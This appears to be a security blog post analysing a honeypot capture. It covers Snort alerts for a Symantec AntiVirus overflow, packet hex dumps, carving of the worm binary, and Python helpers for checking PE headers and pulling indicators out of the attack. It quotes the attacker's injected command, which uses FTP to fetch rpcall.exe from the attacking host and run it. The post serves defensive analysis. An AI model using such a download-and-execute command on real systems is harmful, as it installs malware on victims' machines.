Tuesday, December 04, 2007

x4D x5A ......x50 x45


In this post I am going to demonstrate the analysis process after discovering a successful download on my honeypot.

Checking my IDS logs, I noticed a PE executable download rule fire:

> ./snortalog.pl /nsm/snort/alert -3 -attack -fday 13

subject: IDS Statistics generated on Tue Nov 13 08:45:55 2007

The log begins at : Nov 13 00:00:16

The log ends at : Nov 13 08:46:11

Total of Lines in log file : 155255

Total of Logs Dropped : 35028 (22.56%)

Filter Running: day = 13

Total events in table : 27973

Source IP recorded : 17

Destination IP recorded : 10

Host logger recorded : 1 with 1 interface(s)

Signatures recorded : 22

Classification recorded : 9

Severity recorded : 4

Portscan detected : 0

Distribution of attack methods

=============================================================================================================

### 22 of 22 ###

% No Attack Priority Severity

=============================================================================================================

……

0.02 5 EXPLOIT symantec antivirus realtime virusscan overflow attempt {tcp} 1 high

0.01 4 SHELLCODE x86 inc ebx NOOP {tcp} 1 high

0.01 2 MS-SQL Worm propagation attempt {udp} 2 medium

0.01 2 SHELLCODE x86 NOOP {tcp} 1 high

0.01 2 BLEEDING-EDGE POLICY Google IM traffic Jabber client sign-on {tcp} 1 high

0.01 2 DNS SPOOF query response with TTL of 1 min. and no authority {udp} 2 medium

0.00 1 BLEEDING-EDGE MALWARE SOCKSv4 HTTP Proxy Inbound Request (Linux Source) {tcp} 3 low

0.00 1 BLEEDING-EDGE POLICY RDP connection request {tcp} 3 low

0.00 1 MISC MS Terminal server request {tcp} 3 low

0.00 1 BLEEDING-EDGE MALWARE SOCKSv4 HTTP Proxy Inbound Request (Windows Source) {tcp} 3 low

0.00 1 (http_inspect) OVERSIZE REQUEST-URI DIRECTORY {tcp} 3 unknown

0.00 1 BLEEDING-EDGE PE EXE or DLL Windows file download {tcp} 3 low

0.00 1 BLEEDING-EDGE MALWARE SOCKSv4 Inbound Connect Request (Linux Source) {tcp} 3 low

0.00 1 BLEEDING-EDGE POLICY RDP connection confirm {tcp} 3 low

0.00 1 BLEEDING-EDGE MALWARE SOCKSv4 Inbound Connect Request (Windows Source) {tcp} 3 low

Version: 2.4.2

Jeremy CHARTIER,

Date: 04/02/2007 14:52:11

Using snortalog's src_dst_attack option, we find the source IP and, more importantly, two different alerts from the same IP:

> ./snortalog.pl /nsm/snort/alert -3 -src_dst_attack -fday 13

........

0.00 1 71.40.196.103 192.168.0.34 EXPLOIT symantec antivirus realtime virusscan overflow attempt {tcp}

0.00 1 71.40.196.103 192.168.0.34 BLEEDING-EDGE PE EXE or DLL Windows file download {tcp}


Going to the packet data Snort logged for these alerts, we get the story.

# tcpdump -vvnnXs 1514 -r snort.log.1194918671 host 71.40.196.103

reading from file snort.log.1194918671, link-type EN10MB (Ethernet)

00:31:39.629624 IP (tos 0x0, ttl 46, id 11982, offset 0, flags [DF], proto: TCP (6), length: 1492) 71.40.196.103.52569 > 192.168.0.34.2967: ., cksum 0xaaef (correct), 3854001018:3854002470(1452) ack 3652677825 win 64240

0x0000: 4500 05d4 2ece 4000 2e06 4bfc 4728 c467 E.....@...K.G(.g

0x0010: c0a8 0022 cd59 0b97 e5b7 637a d9b7 70c1 ...".Y....cz..p.

0x0020: 5010 faf0 aaef 0000 0110 0f20 0a00 0000 P...............

0x0030: 0218 0001 0000 0000 0024 0014 b7c9 d2d9 .........$......

0x0040: 3e33 ef34 251f 4300 0202 5c2f 6161 6161 >3.4%.C...\/aaaa

0x0050: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0060: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0070: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0080: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0090: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00a0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00b0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00c0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00d0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00e0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x00f0: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0100: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0110: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0120: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0130: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa

0x0140: 6161 6161 6161 6161 6161 6162 6262 6262 aaaaaaaaaaabbbbb

.......

00:31:42.622794 IP (tos 0x0, ttl 46, id 12544, offset 0, flags [DF], proto: TCP (6), length: 1492) 71.40.196.103.52964 > 192.168.0.34.65535: ., cksum 0x11e7 (correct), 3870755453:3870756905(1452) ack 3658573020 win 64240

0x0000: 4500 05d4 3100 4000 2e06 49ca 4728 c467 E...1.@...I.G(.g

0x0010: c0a8 0022 cee4 ffff e6b7 0a7d da11 64dc ...".......}..d.

0x0020: 5010 faf0 11e7 0000 4d5a 9000 0300 0000 P.......MZ......

0x0030: 0400 0000 ffff 0000 b800 0000 0000 0000 ................

0x0040: 4000 0000 0000 0000 0000 0000 0000 0000 @...............

0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................

0x0060: 0000 0000 c000 0000 0e1f ba0e 00b4 09cd ................

0x0070: 21b8 014c cd21 5468 6973 2070 726f 6772 !..L.!This.progr

0x0080: 616d 2063 616e 6e6f 7420 6265 2072 756e am.cannot.be.run

0x0090: 2069 6e20 444f 5320 6d6f 6465 2e0d 0d0a .in.DOS.mode....

0x00a0: 2400 0000 0000 0000 0e16 3dd2 4a77 5381 $.........=.JwS.

0x00b0: 4a77 5381 4a77 5381 4a77 5381 4e77 5381 JwS.JwS.JwS.NwS.

0x00c0: c468 4081 5e77 5381 b657 4181 4b77 5381 .h@.^wS..WA.KwS.

0x00d0: 5269 6368 4a77 5381 0000 0000 0000 0000 RichJwS.........

0x00e0: 0000 0000 0000 0000 5045 0000 4c01 0200 ........PE..L...

0x00f0: 08b3 f445 0000 0000 0000 0000 e000 0f01 ...E............

0x0100: 0b01 050c 000a 0000 72f7 0100 0000 0000 ........r.......

0x0110: 0010 0000 0010 0000 0020 0000 0000 0010 ................

.........

We know port 2967 all too well: it is the Symantec AntiVirus (SAV) real-time virus scan service port, so this is the SAV overflow followed by the EXE download. In the second packet we see a valid download of a binary, marked by the "MZ" DOS stub and the "PE" file header.

Had this been a real host and not a honeypot, we could conclude that it was successfully exploited by the worm payload: the shellcode executed on the system and downloaded the worm body. Such a host would need to be examined further.

From here we can extract the binary from the full content data using tcpxtract.

# tcpdump -r shark_00001_20071112193138 -w dump host 71.40.196.103

reading from file shark_00001_20071112193138, link-type EN10MB (Ethernet)

and then:

# tcpxtract -f dump

Found file of type "exe" in session [71.40.196.103:58574 -> 192.168.0.34:65535], exporting to 00000000.exe

Found file of type "pe" in session [71.40.196.103:58574 -> 192.168.0.34:65535], exporting to 00000001.pe

Found file of type "exe" in session [71.40.196.103:58574 -> 192.168.0.34:65535], exporting to 00000002.exe

It is important to note that these three extracted files are most likely the same binary: tcpxtract starts a new output file every time it finds an "MZ" or "PE" signature in the stream, so a single download produces overlapping carves. Using our knowledge of the PE file format we can determine that the only valid executable is the "00000000.exe" file, the one that begins with the MZ header.
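The header check described above, written out as an added Python example that is not part of the original post. The sample bytes are transcribed from the TCP payload of the second packet in the tcpdump output above (dump offset 0x28 onward), so the fields it reports come straight from that hex dump; the signature scan mimics what tcpxtract does when it carves on "MZ" and "PE", and shows why a carve that begins at the "PE" signature (the 00000001.pe file) is not a runnable executable on its own. The function names are my own.

```python
import struct

# TCP payload of the second packet in the post's tcpdump output (dump offset
# 0x28 onward), transcribed from the hex dump: the first 248 bytes of the
# download, embedded here as sample input rather than read from a capture.
SAMPLE = bytes.fromhex(
    "4d5a900003000000"
    "04000000ffff0000b800000000000000"
    "40000000000000000000000000000000"
    "00000000000000000000000000000000"
    "00000000c00000000e1fba0e00b409cd"
    "21b8014ccd21546869732070726f6772"
    "616d2063616e6e6f742062652072756e"
    "20696e20444f53206d6f64652e0d0d0a"
    "24000000000000000e163dd24a775381"
    "4a7753814a7753814a7753814e775381"
    "c46840815e775381b65741814b775381"
    "526963684a7753810000000000000000"
    "0000000000000000504500004c010200"
    "08b3f4450000000000000000e0000f01"
    "0b01050c000a000072f7010000000000"
    "00100000001000000020000000000010"
)

# The two signatures a carving tool keys on for Windows binaries.
SIGNATURES = {b"MZ": "MZ", b"PE\0\0": "PE"}


def find_signatures(buf):
    """Every offset at which a signature-based carver would start a new output file."""
    hits = []
    for sig, name in SIGNATURES.items():
        start = 0
        while (pos := buf.find(sig, start)) != -1:
            hits.append((pos, name))
            start = pos + 1
    return sorted(hits)


def parse_pe_header(buf):
    """Walk the MZ -> e_lfanew -> 'PE\\0\\0' chain at the start of buf.

    Returns the COFF/optional header fields as a dict, or None when the chain
    is broken: no MZ stub (a carve that began at the PE signature), an
    e_lfanew pointing outside the buffer (a truncated carve), or no PE
    signature where e_lfanew says it should be.
    """
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    # Need signature (4) + COFF file header (20) + optional header magic (2).
    if e_lfanew + 26 > len(buf) or buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsect, tstamp, _symptr, _nsyms, optsize, chars = struct.unpack_from(
        "<HHIIIHH", buf, e_lfanew + 4)
    magic = struct.unpack_from("<H", buf, e_lfanew + 24)[0]
    entry = None
    if e_lfanew + 44 <= len(buf):  # AddressOfEntryPoint is at optional header + 16
        entry = struct.unpack_from("<I", buf, e_lfanew + 40)[0]
    return {"e_lfanew": e_lfanew, "machine": machine, "sections": nsect,
            "timestamp": tstamp, "opt_header_size": optsize,
            "characteristics": chars, "opt_magic": magic, "entry_point": entry}


def carve_candidates(buf):
    """For each signature hit, say whether a file carved from there has a valid header chain."""
    return [(pos, name, parse_pe_header(buf[pos:]) is not None)
            for pos, name in find_signatures(buf)]


if __name__ == "__main__":
    for pos, name, ok in carve_candidates(SAMPLE):
        print(f"offset 0x{pos:04x} sig {name}: {'valid PE' if ok else 'not a standalone PE'}")
    print(parse_pe_header(SAMPLE))
```

On the bytes from the post, the MZ carve at offset 0 resolves to a PE header at e_lfanew 0xc0 with machine 0x14c (i386), two sections and an optional-header magic of 0x10b (PE32); the carve starting at the "PE" signature fails the check because it has no DOS stub in front of it, which is exactly why only 00000000.exe is worth keeping.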

A look with tcpflow gives us the name of the binary and the injected FTP command:

071.040.196.103.52580-192.168.000.034.08555: cmd /c echo open 71.40.196.103 19090 >> ii &echo user 1 1 >> ii &echo get rpcall.exe >> ii &echo bye >> ii &ftp-n -v -s:ii &del ii &rpcall.exe
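The tcpflow line above carries everything an incident responder needs as indicators: the FTP server and port the script connects to, the credentials, the file it fetches and the binary it launches. Below is an added Python example, not code from the original post, that parses that stream name and command into a structured record so the indicators can be pulled out of many flows the same way. The sample input is the line quoted above, and the regular expression tolerates the "ftp-n" spacing exactly as it appears there; the function names are my own.

```python
import re

# The tcpflow line quoted in the post (stream name plus injected command),
# used here verbatim as the sample input.
FLOW_LINE = (
    "071.040.196.103.52580-192.168.000.034.08555: cmd /c echo open 71.40.196.103 19090 >> ii "
    "&echo user 1 1 >> ii &echo get rpcall.exe >> ii &echo bye >> ii &ftp-n -v -s:ii &del ii &rpcall.exe"
)

# 'ftp ... -s:<script>' is the step that replays the script file built by the echo commands.
FTP_SCRIPT_RE = re.compile(r"ftp\b[^&]*-s:(\S+)")


def parse_flow_name(name):
    """tcpflow names streams 'sss.sss.sss.sss.ppppp-ddd.ddd.ddd.ddd.ppppp' with
    zero-padded octets and ports; normalise that to (src, sport, dst, dport)."""
    def side(s):
        ip, port = s.rsplit(".", 1)
        return ".".join(str(int(o)) for o in ip.split(".")), int(port)
    a, b = name.split("-")
    (src, sport), (dst, dport) = side(a), side(b)
    return src, sport, dst, dport


def parse_ftp_dropper(line):
    """Pull the FTP-script dropper details out of one tcpflow line.

    Recognises the 'echo <ftp command> >> <script> & ... & ftp -s:<script>
    & ... & <payload>' shape seen in the post; returns None for anything else.
    """
    stream, sep, cmd = line.partition(": ")
    if not sep:
        return None
    m = FTP_SCRIPT_RE.search(cmd)
    if not m:
        return None
    script = m.group(1)
    src, sport, dst, dport = parse_flow_name(stream)
    info = {"src": src, "src_port": sport, "dst": dst, "dst_port": dport,
            "script_file": script, "ftp_server": None, "ftp_port": 21,
            "ftp_user": None, "ftp_pass": None, "downloads": [], "executes": []}
    # Each 'echo <text> >> <script>' appends one line to the FTP script, in order.
    for entry in re.findall(r"echo (.+?) >> " + re.escape(script), cmd):
        parts = entry.split()
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            info["ftp_server"] = parts[1]
            info["ftp_port"] = int(parts[2]) if len(parts) >= 3 else 21
        elif verb == "user" and len(parts) >= 2:
            info["ftp_user"] = parts[1]
            info["ftp_pass"] = parts[2] if len(parts) >= 3 else ""
        elif verb == "get" and len(parts) >= 2:
            info["downloads"].append(parts[1])
    # Whatever runs after the ftp step is the dropped payload being launched.
    for step in cmd[m.end():].split("&"):
        step = step.strip()
        if step.lower().endswith(".exe"):
            info["executes"].append(step)
    return info


if __name__ == "__main__":
    for key, value in parse_ftp_dropper(FLOW_LINE).items():
        print(f"{key:12} {value}")
```

Run against the line from the post, this yields the FTP server 71.40.196.103 on port 19090, user "1" with password "1", the download rpcall.exe and the same name executed afterwards, all keyed to the honeypot stream 71.40.196.103:52580 to 192.168.0.34:8555; those are the values to push into a blocklist or a retrospective search of other sensors.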

Now that the executable is fully extracted, we can move to our reverse engineering (RE) platform, usually a Windows box running IDA Pro and OllyDbg.

The first thing I like to do is pass the binary through PEiD:

PEiD detected that it is packed with PECompact 2.x. Identifying the packer this way aids in unpacking the malware.

Next I run the malware through VirusTotal to see if it is a known variant. The results show that this is not a highly detected piece of malware: only a few of the AV engines flagged it.

AntiVir 7.6.0.34 2007.11.25 HEUR/Crypted

AVG 7.5.0.503 2007.11.25 BackDoor.RBot.AN

eSafe 7.0.15.0 2007.11.21 Suspicious File

McAfee 5170 2007.11.23 W32/Sdbot.worm.gen.as

Panda 9.0.0.4 2007.11.25 Suspicious file

Prevx1 V2 2007.11.25 Heuristic: Suspicious Self Modifying EXE

Sunbelt 2.2.907.0 2007.11.24 VIPRE.Suspicious

Webwasher-Gateway 6.0.1 2007.11.25 Heuristic.Crypted

In my next post I will demonstrate some reverse engineering, and dynamic analysis tricks to analyze this specimen.

1 comment:

C.S.Lee said...

hi,

I have written some of the tcpxtract tips and tricks here -

http://geek00l.blogspot.com/search?q=tcpxtract

We have also released the HeX liveCD, which contains 10 extra signatures for tcpxtract plus other good stuff.

Nice write-up; I learned about your blog from taosecurity.

Cheers ;]